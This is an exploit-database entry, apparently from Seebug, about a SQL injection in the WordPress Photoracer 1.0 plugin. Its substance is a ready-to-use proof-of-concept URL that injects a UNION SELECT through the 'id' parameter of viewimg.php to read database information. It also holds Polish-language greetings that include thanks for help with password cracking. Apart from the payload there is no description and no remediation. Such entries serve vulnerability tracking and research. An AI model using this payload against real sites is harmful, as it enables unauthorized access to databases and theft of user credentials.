WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability

2009-06-17T00:00:00
ID SSV:11639
Type seebug
Reporter Root
Modified 2009-06-17T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Wordpress Photoracer Plugin => SQL injection
http://wordpress.org/extend/plugins/photoracer/ 

Author: Kacper
Website: http://devilteam.pl/

Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, 

Pozdro: Ratman, Kopaczka, FDJ

Elo: dla GLOBUSa za pomoc w crackowaniu hasel.

Vuln:

http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--

big thanks str0ke for you!

be safe all :)